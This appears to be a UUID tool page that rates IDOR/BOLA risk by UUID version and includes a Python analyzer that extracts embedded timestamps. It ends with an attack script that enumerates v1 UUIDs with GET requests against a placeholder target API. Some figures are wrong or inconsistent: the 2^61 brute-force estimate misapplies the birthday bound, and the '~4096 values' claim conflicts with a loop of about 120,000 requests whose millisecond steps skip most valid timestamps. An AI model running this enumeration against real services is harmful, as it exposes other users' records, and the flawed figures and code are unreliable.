Generate UUID v4, v1, v5, and v7 in bulk. Analyze existing UUIDs to extract timestamps, detect version, and assess IDOR/BOLA vulnerability risk.
Risk by UUID version:
HIGH: v1 / v6 / v7 — Sequential / time-based
Predictable: an attacker can enumerate candidates by incrementing the timestamp component. Within a 2-minute window, v1 has only ~4096 possible values per node.
LOW: v4 — Random
122 bits of cryptographic randomness. Brute force requires ~2^61 guesses to reach 50% probability — computationally infeasible.
HIGH: Nil UUID (all zeros)
00000000-0000-0000-0000-000000000000 is often used as a default or test value. Applications may grant unintended access.
HIGH: Sequential integers formatted as UUIDs
e.g. 00000000-0000-0000-0000-000000000001 — trivially enumerable with a simple loop.
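An analyzer that applies the risk table above to a given identifier, recovering the embedded creation time for v1, v6 and v7 and flagging the nil and zero-padded-integer cases. This is an added example, not the tool's own code; the sample UUIDs and the "only the last group is non-zero" heuristic for padded integers are constructed assumptions.

```python
import uuid
from datetime import datetime, timedelta, timezone

# v1/v6 timestamps count 100 ns ticks since 1582-10-15; v7 stores Unix milliseconds.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)

def embedded_time(u: uuid.UUID):
    """Recover the creation time encoded in a v1, v6 or v7 UUID; None for other versions."""
    if u.version == 1:
        time_low, time_mid, time_hi_version, *_ = u.fields
        ticks = ((time_hi_version & 0x0FFF) << 48) | (time_mid << 32) | time_low
        return GREGORIAN_EPOCH + timedelta(microseconds=ticks // 10)
    if u.version == 6:  # same 60-bit counter as v1, stored most-significant part first
        ticks = ((u.int >> 96) << 28) | (((u.int >> 80) & 0xFFFF) << 12) | ((u.int >> 64) & 0x0FFF)
        return GREGORIAN_EPOCH + timedelta(microseconds=ticks // 10)
    if u.version == 7:  # top 48 bits are Unix time in milliseconds
        return datetime.fromtimestamp((u.int >> 80) / 1000, tz=timezone.utc)
    return None

def assess(identifier: str) -> dict:
    """Classify one identifier with the risk table: nil, padded integer, time-based, random."""
    u = uuid.UUID(identifier)
    ts = embedded_time(u)
    if u.int == 0:
        risk, reason = "HIGH", "nil UUID, commonly a default or test value"
    elif u.int < (1 << 48):  # heuristic (assumption): only the last group is non-zero
        risk, reason = "HIGH", "sequential integer formatted as a UUID"
    elif u.version in (1, 6, 7):
        risk, reason = "HIGH", f"time-based v{u.version}, created {ts.isoformat()}"
    elif u.version == 4:
        risk, reason = "LOW", "122 bits of randomness"
    else:
        risk, reason = "UNKNOWN", f"version {u.version}, variant {u.variant}"
    return {"uuid": str(u), "version": u.version, "timestamp": ts, "risk": risk, "reason": reason}

if __name__ == "__main__":
    # Constructed samples: a v1 stamped 2020-01-01T00:00:00Z, a v7 stamped at
    # Unix ms 1700000000000, a well-known v4, the nil UUID and a zero-padded integer.
    for sample in ("a747c000-2c29-11ea-b14d-0242ac110002",
                   "018bcfe5-6800-7c3a-9d2e-5f6a7b8c9d0e",
                   "550e8400-e29b-41d4-a716-446655440000",
                   "00000000-0000-0000-0000-000000000000",
                   "00000000-0000-0000-0000-000000000001"):
        r = assess(sample)
        print(f"{r['uuid']}  v{r['version']}  {r['risk']:<4} {r['reason']}")
```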
Brute-forcing v1 UUIDs (2-minute window, ~4096 possibilities):

```python
# Known v1 UUID leaked at approx timestamp T
# Enumerate ±1 minute around T in steps of 10,000 ticks (1 ms at 100 ns tick resolution)
import uuid, requests

BASE_URL = "https://target.com/api/resource/"

# Extract 60-bit timestamp from known UUID
known = uuid.UUID("xxxxxxxx-xxxx-1xxx-xxxx-xxxxxxxxxxxx")
t = known.time  # 100-nanosecond intervals since 1582-10-15

for delta in range(-600_000_000, 600_000_000, 10000):
    candidate_time = t + delta
    # Reconstruct UUID with modified timestamp
    time_low = candidate_time & 0xFFFFFFFF
    time_mid = (candidate_time >> 32) & 0xFFFF
    time_hi = (candidate_time >> 48) & 0x0FFF
    candidate = f"{time_low:08x}-{time_mid:04x}-1{time_hi:03x}-{known.clock_seq_hi_variant:02x}{known.clock_seq_low:02x}-{known.node:012x}"
    r = requests.get(BASE_URL + candidate)
    if r.status_code == 200:
        print(f"[+] Found: {candidate}")
```